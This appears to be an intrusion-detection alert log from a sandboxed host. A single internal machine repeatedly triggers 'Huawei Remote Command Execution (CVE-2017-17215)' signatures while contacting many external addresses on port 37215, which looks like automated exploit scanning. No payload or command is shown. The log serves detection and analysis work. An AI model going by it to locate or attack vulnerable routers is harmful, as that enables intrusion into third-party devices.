                                                        06/13/24-21:33:00.871918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052437215192.168.2.14156.136.244.245
                                                        06/13/24-21:32:42.409088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718637215192.168.2.1441.147.180.97
                                                        06/13/24-21:32:48.570774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808037215192.168.2.14197.241.216.210
                                                        06/13/24-21:32:15.610561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453237215192.168.2.14197.138.66.129
                                                        06/13/24-21:32:32.168976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510037215192.168.2.14197.3.97.174
                                                        06/13/24-21:32:03.306890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338037215192.168.2.14197.239.46.197
                                                        06/13/24-21:33:05.017070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825437215192.168.2.14197.127.229.45
                                                        06/13/24-21:32:23.836798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14197.141.78.237
                                                        06/13/24-21:32:56.785574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494637215192.168.2.14197.41.182.215
                                                        06/13/24-21:33:17.308960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799837215192.168.2.1441.230.196.237
                                                        06/13/24-21:32:15.606172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585037215192.168.2.1441.104.70.125
                                                        06/13/24-21:32:03.294685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3833237215192.168.2.1441.211.167.205
                                                        06/13/24-21:32:19.730245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972237215192.168.2.14197.71.187.109
                                                        06/13/24-21:33:04.991553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391437215192.168.2.14197.48.165.36
                                                        06/13/24-21:33:09.130232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270837215192.168.2.14197.22.152.212
                                                        06/13/24-21:33:17.307077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618637215192.168.2.1441.102.228.203
                                                        06/13/24-21:32:01.241882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696437215192.168.2.14156.231.28.116
                                                        06/13/24-21:32:48.568127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656637215192.168.2.14156.182.147.37
                                                        06/13/24-21:32:36.247200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543637215192.168.2.14156.108.0.18
                                                        06/13/24-21:33:11.160081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174437215192.168.2.14156.126.119.170
                                                        06/13/24-21:32:42.409659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403637215192.168.2.1441.3.82.179
                                                        06/13/24-21:32:21.806008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656437215192.168.2.14197.202.99.58
                                                        06/13/24-21:32:50.632811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930437215192.168.2.14197.91.108.196
                                                        06/13/24-21:32:58.821993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968037215192.168.2.1441.98.86.212
                                                        06/13/24-21:32:28.027122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970837215192.168.2.1441.79.17.190
                                                        06/13/24-21:33:17.309844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027637215192.168.2.1441.104.83.157
                                                        06/13/24-21:32:38.300777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346237215192.168.2.14197.205.136.112
                                                        06/13/24-21:31:59.175738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255637215192.168.2.14197.51.77.50
                                                        06/13/24-21:32:01.220803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037637215192.168.2.14197.173.171.143
                                                        06/13/24-21:32:48.570053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597837215192.168.2.14156.56.95.245
                                                        06/13/24-21:32:09.459028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222437215192.168.2.14156.74.249.253
                                                        06/13/24-21:32:11.506556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544237215192.168.2.1441.38.85.59
                                                        06/13/24-21:32:42.403036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725037215192.168.2.14156.233.245.53
                                                        06/13/24-21:32:32.166377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074437215192.168.2.1441.48.52.59
                                                        06/13/24-21:32:07.401431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022437215192.168.2.14156.210.37.104
                                                        06/13/24-21:32:13.545157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688837215192.168.2.14156.227.154.3
                                                        06/13/24-21:32:48.549579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886637215192.168.2.14156.231.33.246
                                                        06/13/24-21:32:15.629333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196837215192.168.2.14156.226.184.14
                                                        06/13/24-21:32:40.373881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255637215192.168.2.1441.101.63.108
                                                        06/13/24-21:32:15.611355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739837215192.168.2.14197.220.12.45
                                                        06/13/24-21:33:00.865956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476237215192.168.2.14197.193.67.171
                                                        06/13/24-21:33:09.090676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710037215192.168.2.14156.199.229.228
                                                        06/13/24-21:32:48.552301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317237215192.168.2.1441.173.65.101
                                                        06/13/24-21:32:03.299196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.14197.32.214.232
                                                        06/13/24-21:32:17.674976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614837215192.168.2.14197.87.159.1
                                                        06/13/24-21:32:23.945917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793037215192.168.2.14197.23.110.121
                                                        06/13/24-21:32:48.553427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727037215192.168.2.14197.185.207.87
                                                        06/13/24-21:32:48.572803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691437215192.168.2.1441.45.147.112
                                                        06/13/24-21:32:48.553289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595237215192.168.2.1441.171.97.196
                                                        06/13/24-21:32:13.543283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659437215192.168.2.14156.11.9.0
                                                        06/13/24-21:32:01.222717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481637215192.168.2.1441.75.138.125
                                                        06/13/24-21:32:42.404567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967437215192.168.2.1441.23.212.211
                                                        06/13/24-21:32:44.452909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.14197.228.243.252
                                                        06/13/24-21:33:13.212071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282037215192.168.2.14197.117.105.213
                                                        06/13/24-21:32:56.790122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493437215192.168.2.14197.98.80.170
                                                        06/13/24-21:32:32.153636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762237215192.168.2.14197.240.110.53
                                                        06/13/24-21:32:03.279587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450437215192.168.2.14197.110.122.85
                                                        06/13/24-21:32:28.045630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915237215192.168.2.1441.213.242.218
                                                        06/13/24-21:32:15.611550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011037215192.168.2.14197.79.67.105
                                                        06/13/24-21:33:00.867672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5582437215192.168.2.14197.8.156.10
                                                        06/13/24-21:32:17.676438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314437215192.168.2.14156.240.71.65
                                                        06/13/24-21:32:28.027454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959237215192.168.2.14197.178.66.4
                                                        06/13/24-21:33:07.042877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473037215192.168.2.14197.198.52.160
                                                        06/13/24-21:33:04.993097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238837215192.168.2.14197.59.19.251
                                                        06/13/24-21:32:11.486976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194437215192.168.2.14197.102.29.42
                                                        06/13/24-21:32:56.759339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749437215192.168.2.1441.40.111.197
                                                        06/13/24-21:32:32.152875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624837215192.168.2.14197.221.109.60
                                                        06/13/24-21:33:11.174147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727237215192.168.2.1441.51.40.128
                                                        06/13/24-21:32:44.457557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835637215192.168.2.14156.50.86.167
                                                        06/13/24-21:32:46.526063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878437215192.168.2.14197.196.66.17
                                                        06/13/24-21:31:57.092250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998037215192.168.2.14156.254.160.136
                                                        06/13/24-21:32:07.420082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401037215192.168.2.14197.203.84.251
                                                        06/13/24-21:32:44.476446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598437215192.168.2.1441.54.0.39
                                                        06/13/24-21:32:05.348436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824437215192.168.2.1441.4.70.61
                                                        06/13/24-21:32:58.843558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835037215192.168.2.14197.80.73.183
                                                        06/13/24-21:32:23.942572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174437215192.168.2.14156.195.133.128
                                                        06/13/24-21:32:52.657293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555237215192.168.2.14197.99.99.77
                                                        06/13/24-21:32:44.454821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.1441.148.218.93
                                                        06/13/24-21:32:34.200004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570637215192.168.2.14156.23.176.28
                                                        06/13/24-21:33:09.085316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823037215192.168.2.14156.162.213.0
                                                        06/13/24-21:33:04.993286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024037215192.168.2.1441.255.187.159
                                                        06/13/24-21:31:59.173893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504837215192.168.2.1441.128.90.49
                                                        06/13/24-21:32:03.304056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913437215192.168.2.14197.208.7.5
                                                        06/13/24-21:32:05.349218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045837215192.168.2.14197.179.243.163
                                                        06/13/24-21:33:15.256452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222637215192.168.2.1441.243.108.3
                                                        06/13/24-21:33:17.309969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685837215192.168.2.14197.24.177.166
                                                        06/13/24-21:32:32.155725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681637215192.168.2.1441.60.93.191
                                                        06/13/24-21:32:36.263640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689037215192.168.2.14197.162.162.4
                                                        06/13/24-21:32:54.707847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435237215192.168.2.14156.195.87.35
                                                        06/13/24-21:32:56.789773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372837215192.168.2.14156.53.80.11
                                                        06/13/24-21:32:34.199405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624037215192.168.2.14197.124.117.189
                                                        06/13/24-21:32:19.749872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694837215192.168.2.14156.53.147.211
                                                        06/13/24-21:32:38.323897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593637215192.168.2.1441.221.176.5
                                                        06/13/24-21:32:01.224723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395437215192.168.2.14197.82.80.162
                                                        06/13/24-21:32:32.151012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534637215192.168.2.1441.249.148.187
                                                        06/13/24-21:33:00.885239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838837215192.168.2.1441.243.253.56
                                                        06/13/24-21:33:07.041880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677237215192.168.2.14156.230.234.101
                                                        06/13/24-21:33:09.087655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847037215192.168.2.14156.210.116.137
                                                        06/13/24-21:32:11.486507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977237215192.168.2.1441.235.49.159
                                                        06/13/24-21:33:09.111889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161837215192.168.2.14197.28.117.136
                                                        06/13/24-21:33:13.213577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478637215192.168.2.14156.31.70.92
                                                        06/13/24-21:32:11.486448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165837215192.168.2.14197.183.8.121
                                                        06/13/24-21:32:19.727874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280037215192.168.2.14156.73.211.196
                                                        06/13/24-21:32:52.677356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422637215192.168.2.14197.173.239.79
                                                        06/13/24-21:33:00.867955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130837215192.168.2.14197.217.34.168
                                                        06/13/24-21:32:30.079791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694637215192.168.2.14156.227.175.19
                                                        06/13/24-21:32:40.371764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096037215192.168.2.14156.29.251.7
                                                        06/13/24-21:33:00.887152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976237215192.168.2.14197.140.225.77
                                                        06/13/24-21:32:23.940609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5176837215192.168.2.14197.28.20.240
                                                        06/13/24-21:32:48.569251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349637215192.168.2.14156.66.241.16
                                                        06/13/24-21:32:17.676219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212637215192.168.2.1441.89.23.74
                                                        06/13/24-21:32:32.151276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572637215192.168.2.14197.192.134.222
                                                        06/13/24-21:32:32.171336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947837215192.168.2.14156.98.182.164
                                                        06/13/24-21:32:19.749768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288837215192.168.2.14197.167.194.35
                                                        06/13/24-21:32:25.972864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994837215192.168.2.1441.13.202.209
                                                        06/13/24-21:33:17.306691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757237215192.168.2.1441.197.88.97
                                                        06/13/24-21:32:15.607324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5423837215192.168.2.14156.91.90.59
                                                        06/13/24-21:32:34.217257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959037215192.168.2.14197.130.220.87
                                                        06/13/24-21:33:13.212747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404237215192.168.2.14156.223.158.225
                                                        06/13/24-21:32:40.358008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861237215192.168.2.1441.0.233.85
                                                        06/13/24-21:32:15.610174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299837215192.168.2.1441.173.107.110
                                                        06/13/24-21:32:32.156519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857637215192.168.2.14197.196.31.5
                                                        06/13/24-21:32:46.503366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757237215192.168.2.1441.40.128.79
                                                        06/13/24-21:32:46.526199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859037215192.168.2.14156.178.204.238
                                                        06/13/24-21:32:09.440748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288837215192.168.2.1441.242.193.249
                                                        06/13/24-21:32:25.976881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285037215192.168.2.1441.205.50.153
                                                        06/13/24-21:32:58.823602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837837215192.168.2.1441.218.215.46
                                                        06/13/24-21:32:52.677993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14197.162.57.244
                                                        06/13/24-21:33:15.254035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532637215192.168.2.1441.66.119.27
                                                        06/13/24-21:32:48.553736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3996237215192.168.2.14197.7.65.132
                                                        06/13/24-21:33:00.867166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493037215192.168.2.14156.133.207.97
                                                        06/13/24-21:32:07.402238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518837215192.168.2.1441.26.58.124
                                                        06/13/24-21:32:44.478724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133837215192.168.2.14156.78.195.164
                                                        06/13/24-21:32:05.343644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155037215192.168.2.1441.43.142.61
                                                        06/13/24-21:32:25.997333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439637215192.168.2.1441.6.57.1
                                                        06/13/24-21:33:13.210672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511037215192.168.2.14156.118.108.81
                                                        06/13/24-21:32:21.782088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839437215192.168.2.14156.116.43.59
                                                        06/13/24-21:32:56.757830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929837215192.168.2.14197.209.140.91
                                                        06/13/24-21:32:17.671521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127837215192.168.2.1441.182.15.14
                                                        06/13/24-21:33:02.914670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993037215192.168.2.1441.223.159.129
                                                        06/13/24-21:32:50.611084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921637215192.168.2.14156.183.249.207
                                                        06/13/24-21:33:09.085589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690837215192.168.2.14197.247.81.185
                                                        06/13/24-21:33:02.913292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803637215192.168.2.14156.47.18.2
                                                        06/13/24-21:32:50.631968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756837215192.168.2.14197.63.211.132
                                                        06/13/24-21:33:05.011690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696237215192.168.2.14156.84.245.161
                                                        06/13/24-21:32:50.630150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080637215192.168.2.1441.191.206.97
                                                        06/13/24-21:32:09.436761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154837215192.168.2.14197.26.215.132
                                                        06/13/24-21:32:34.213640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481637215192.168.2.1441.78.186.16
                                                        06/13/24-21:32:28.045687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790437215192.168.2.14156.92.100.127
                                                        06/13/24-21:32:07.401531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.14156.118.80.92
                                                        06/13/24-21:33:13.230963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5248237215192.168.2.1441.207.148.56
                                                        06/13/24-21:33:02.949872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917037215192.168.2.14156.168.228.180
                                                        06/13/24-21:32:09.456159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446837215192.168.2.14156.51.117.19
                                                        06/13/24-21:32:32.165159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4592037215192.168.2.14156.163.28.20
                                                        06/13/24-21:32:52.676780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340037215192.168.2.1441.209.63.235
                                                        06/13/24-21:32:01.224449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283037215192.168.2.14156.29.211.164
                                                        06/13/24-21:33:04.990465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518637215192.168.2.1441.5.42.34
                                                        06/13/24-21:32:44.456947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764837215192.168.2.14197.72.114.108
                                                        06/13/24-21:33:11.156569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277437215192.168.2.14197.212.11.49
                                                        06/13/24-21:32:09.440282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809437215192.168.2.1441.243.185.159
                                                        06/13/24-21:32:40.355337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362837215192.168.2.14197.101.182.55
                                                        06/13/24-21:33:13.227771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432437215192.168.2.1441.249.15.9
                                                        06/13/24-21:32:23.833563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653637215192.168.2.14156.210.68.212
                                                        06/13/24-21:32:48.551069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663637215192.168.2.14156.191.154.223
                                                        06/13/24-21:32:15.609744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132237215192.168.2.14197.152.159.232
                                                        06/13/24-21:32:25.995407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045037215192.168.2.1441.207.58.159
                                                        06/13/24-21:32:58.839184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612637215192.168.2.14156.224.137.174
                                                        06/13/24-21:33:11.180623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019637215192.168.2.1441.216.241.6
                                                        06/13/24-21:32:25.992589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967237215192.168.2.1441.7.60.55
                                                        06/13/24-21:32:15.635190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211037215192.168.2.1441.196.232.83
                                                        06/13/24-21:33:15.274530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285037215192.168.2.14197.228.11.78
                                                        06/13/24-21:32:17.702465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469437215192.168.2.14156.40.254.40
                                                        06/13/24-21:32:23.836728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444437215192.168.2.14156.45.13.73
                                                        06/13/24-21:32:42.420416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3971037215192.168.2.14197.123.241.60
                                                        06/13/24-21:32:13.544536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252637215192.168.2.1441.206.90.17
                                                        06/13/24-21:31:59.173998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839837215192.168.2.1441.77.195.149
                                                        06/13/24-21:32:01.241351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815837215192.168.2.14156.223.59.169
                                                        06/13/24-21:32:28.026837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335037215192.168.2.14197.247.129.164
                                                        06/13/24-21:32:58.843863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440837215192.168.2.14197.193.129.243
                                                        06/13/24-21:33:15.272036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630237215192.168.2.1441.7.55.162
                                                        06/13/24-21:33:09.090715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560237215192.168.2.1441.32.142.194
                                                        06/13/24-21:32:58.822422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617637215192.168.2.14156.19.32.44
                                                        06/13/24-21:31:59.174661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734237215192.168.2.1441.152.29.217
                                                        06/13/24-21:32:03.275597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855237215192.168.2.14156.157.250.81
                                                        06/13/24-21:32:13.545626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777237215192.168.2.14197.86.100.101
                                                        06/13/24-21:32:52.676106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963037215192.168.2.1441.48.19.9
